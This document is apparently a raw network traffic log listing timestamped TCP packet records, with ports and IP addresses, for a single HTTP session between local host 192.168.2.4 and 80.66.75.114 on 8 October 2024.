                                                            Oct 8, 2024 10:08:39.114156961 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.114192009 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.114272118 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.114337921 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242379904 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.242454052 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.242506027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.242541075 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.242558002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242558956 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242558956 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242577076 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.242609024 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.242634058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242634058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242649078 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.242660999 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242681026 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.242705107 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242724895 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242733955 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.242767096 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.242794991 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242799997 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.242816925 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242839098 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.242857933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242875099 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.242897987 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242923021 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.242964983 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.243000984 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.243019104 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.243053913 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.243170023 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.243205070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.243223906 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.243249893 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.387662888 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.392777920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.751545906 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.751571894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.751588106 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.751602888 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.751615047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.751631021 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.751641989 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.751651049 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.751660109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.751668930 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.751811981 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.754888058 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.754919052 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.754951954 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.754965067 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.754988909 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.754988909 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.755009890 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.755023956 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.755044937 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.755057096 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.755074024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.755090952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.755109072 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.755125046 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.755141973 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.755179882 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.892496109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892568111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892605066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892638922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892673969 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892709970 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892733097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.892733097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.892745018 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892782927 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.892803907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.892888069 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893011093 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893049955 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893085003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893119097 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893151999 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893183947 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893210888 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893217087 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893210888 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893249989 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893281937 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893285036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893321037 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893336058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893357992 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893384933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893423080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893456936 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893461943 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893496990 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893529892 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893543959 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893568039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.893625975 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.893676043 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.894263029 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.894316912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.894352913 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.894359112 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.894392014 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.894437075 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.894514084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.896080971 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.896172047 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032588959 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032634020 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032690048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032704115 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032705069 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032723904 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032776117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032777071 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032777071 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032810926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032826900 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032845020 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032859087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032879114 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032898903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032912016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032926083 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032946110 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.032958031 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.032995939 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033005953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033040047 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033057928 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033073902 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033087969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033123016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033128023 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033160925 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033178091 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033195019 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033206940 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033230066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033246994 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033274889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033364058 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033413887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033416033 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033449888 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033462048 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033483982 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033500910 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033518076 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033535957 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033550978 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033565998 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033586979 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033601046 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033623934 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033637047 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033687115 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.033940077 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.033972979 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034003019 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034009933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034023046 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034063101 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034110069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034142971 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034158945 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034178972 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034193993 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034212112 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034229040 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034245968 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034256935 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034296989 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034477949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034532070 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034532070 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034567118 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.034580946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.034617901 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166059971 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166095972 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166130066 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166209936 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166217089 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166284084 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166321039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166340113 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166354895 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166405916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166424036 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166438103 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166471958 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166505098 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166511059 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166557074 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166601896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166634083 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166639090 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166666031 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166687965 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166698933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166732073 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166750908 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166768074 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166800022 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166832924 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.166848898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.166917086 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167227030 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167260885 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167296886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167314053 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167371988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167406082 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167448044 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167479992 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167556047 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167620897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167660952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167695045 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167704105 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167726994 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167776108 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167784929 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167808056 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167840958 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167867899 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167872906 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167907953 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.167922020 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.167990923 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.168118000 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.168149948 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.168183088 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.168198109 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.168278933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300610065 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300736904 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300750971 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300781012 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300803900 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300816059 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300841093 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300849915 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300863981 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300900936 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300900936 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300937891 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.300956011 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.300970078 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301006079 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301004887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301027060 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301038980 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301058054 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301071882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301093102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301109076 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301131964 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301172972 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301398039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301430941 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301462889 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301465988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301484108 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301500082 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301521063 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301533937 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.301554918 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.301632881 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302145004 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302177906 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302210093 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302213907 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302234888 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302244902 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302253008 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302294016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302294016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302325964 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302346945 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302360058 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302376032 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302393913 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302413940 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302428007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302448988 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302463055 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302481890 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302496910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302514076 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302531958 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302551031 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302586079 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302752972 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302786112 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302807093 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302819014 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302838087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302853107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302869081 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302889109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302907944 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302917957 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.302943945 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.302963018 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.440871954 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.440917969 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.440956116 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.440994978 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.440992117 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.440992117 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441029072 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.441063881 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.441063881 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441063881 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441090107 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441097021 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.441107988 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441154957 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.441164017 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441206932 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.441210985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441242933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.441257954 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441277027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.441296101 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441309929 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.441318989 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441359997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441361904 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.441396952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:40.441411972 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:40.441430092 CEST804973080.66.75.114192.168.2.4
